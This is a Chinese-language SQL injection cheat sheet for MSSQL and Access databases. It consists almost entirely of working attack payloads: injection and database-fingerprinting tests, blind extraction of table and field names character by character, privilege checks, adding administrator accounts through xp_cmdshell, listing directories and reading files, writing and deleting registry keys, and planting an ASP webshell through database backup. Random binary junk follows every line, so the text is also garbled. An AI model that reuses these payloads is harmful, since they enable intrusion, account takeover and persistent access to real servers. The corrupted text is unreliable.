1.判断是否有注入;and 1=1 ;and 1=2 �_UI*W&��*
2.初步判断是否是mssql ;and user>0 Xt}
�4�B#�
H{����hd1
3.注入参数是字符'and [查询条件] and ''=' $l�VR6��|n
W T~�UEK'
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,�a
�2(�h�
g\%;b3"#��
5.判断数据库系统 Sq�n|��
�/<C}v�~r
;and (select count(*) from sysobjects)>0 mssql ut
j7"{'k|
sE�:~+C6o:
;and (select count(*) from msysobjects)>0 access �&rs������
{G��.��W?�
J��u�i:Ms�
QiKci�%=SX
6.猜数据库 ;and (select Count(*) from [数据库名])>0 J'}G~r�B<<
~?#>QN\\c
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 S�bL�����m
n#$sLX�V�y
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5ir
�Ff��r
OEi�u,Y|@l
9.(1)猜字段的ascii值(access) ���>f$N��G
zb�Y2gq@�?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 7Xz�h�KA�6
2i0�� .�x�
(2)猜字段的ascii值(mssql) 3']a1\�sy^
<�$z6:4uN_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 @I"&k!�e<2
0{���U�c/�
10.测试权限结构(mssql) Eqizx~e�qq
� m�#K)�%0
�}�Wl��m#t
pmwV�V�UEQ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- =�-bG�H
��
5}C�.^��J`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- qTZ\;[CrP"
_+7�+90�u�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Ah�2�*7�@U
�/aTW ���X
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- {{6�D4M|s
[g�<Y,�0,J
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �[x%[N)U�3
=�y^`�yv 3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- /O[<"Wcz��
\+�M6R�<Qw
;and 1=(select IS_MEMBER('db_owner'));-- �o|kiwr}�Y
yE&WGp�T��
�-�.@dA'j[
B%7A�z!GX
11.添加mssql和系统的帐户 /�
f5q9sp8
"_^vQ1�M]Z
;exec master.dbo.sp_addlogin username;-- �_^�/k����
;exec master.dbo.sp_password null,username,password;-- �9\'Jt�ZO�
`' .;U=mF
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- %<)!]�8}P*
4b��s<j���
;exec master.dbo.xp_cmdshell 'net user username password �\E��(^<Af
_lG|�t6��y
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- gU&y5��s~
L��wlO�)|E
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��)-\�C�{>
]-j.\+�(*�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �oB�O4a�^D
�57wHo[CJ�
'aWqj+W�bh
��$fCKK&Wy
12.(1)遍历目录 �LD�*X�NcE
WKA��G)�4
;create table dirs(paths varchar(100), id int) T>hrKn.!D:
aPdEEq�c\l
;insert dirs exec master.dbo.xp_dirtree 'c:\' gc\/A��\F<
<�78*-O�b
;and (select top 1 paths from dirs)>0 5jq @ nq6
u\��{MQB{T
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) W�s�b>3J��
25PZ&^G�8%
v�,'�k�2H�
;k��I)j
�?
(2)遍历目录 Z;O!�K�s�J
�t[r�6�jo7
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- pw�H*&��YU
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 J!�Q �#x�s
9a�2�[�_Wy
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 z]�2MR2W@X
Oq�^��t[X'
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 }��)+iAxR�
�}a���!ny�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �0tz?� �sN
/a*�8z,��x
�.p��=OAh<
q`'�m�:{8
13.mssql中的存储过程 ��cQk�j�{u
6g���abnW3
xp_regenumvalues 注册表根键, 子键 v2IcD�z`}7
��Cc�TdLq�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (mr*Th�y`@
+z�wS�[P�@
xp_regread 根键,子键,键值名 :_,a%�hb+8
�6�B|O�KwL
;exec xp_regread �!gJTKQX4
9�7[wz� C,
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 � Q�'ZZQ
znB+RiV�8�
xp_regwrite 根键,子键, 值名, 值类型, 值 !1ZItJ�74#
^7uXpqQBr�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Jk�v!���]C
:>}�7��^1I
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ���@�SH[<c
�3@nIoN'z�
xp_regdeletevalue 根键,子键,值名 Q<�NQ9�l�X
]4ck)zlv
�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 cTW$;F�pc+
�lVu�Bo&��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Vm?�#��~}T
1`1j�Sx5}.
{Q>4zep�N!
�>k
==7#�P
14.mssql的backup创建webshell cTz@ga;!mI
Zo�r!hc0�<
use model =),���O�;M
�P*jiz@��6
create table cmd(str image); Y�Z�]}�l%e
g&S>�Wq%L�
insert into cmd(str) values (''); LGw-��cX #
�_S�s}dU9�
backup database model to disk='c:\l.asp'; 3ZC@q
#R
A
ALn�_if�Nh
�WJ�x�c�JE
fW�C(�L s�
15.mssql内置函数 +P���nuWK$
�7�Vk9{x$z
;and (select @@version)>0 获得Windows的版本号 E,F^!4 rJ$
�Rp;"�]Q&b
;and user_name()='dbo' 判断当前系统的连接用户是不是sa "@5�q�jLz]
_�k�� :�BY
;and (select user_name())>0 爆当前系统的连接用户 '�4�It>50b
w�_V A:]j4
;and (select db_name())>0 得到当前连接的数据库 f[vm��]1�#
TQ:h�[6��v
E=8�GSl/Jx
%y\5L#T!�>
16.简洁的webshell [M�Q�* =*�
kOd�A8X�RY
use model "��uP*p�R^
-[�J4nN�&N
create table cmd(str image); ��>Tjl?C�S
mZ�Xt�HFMu
insert into cmd(str) values (''); �</Y(4Xwf=
}t"K(oam�m
backup database model to disk='g:\wwwtest\l.asp';
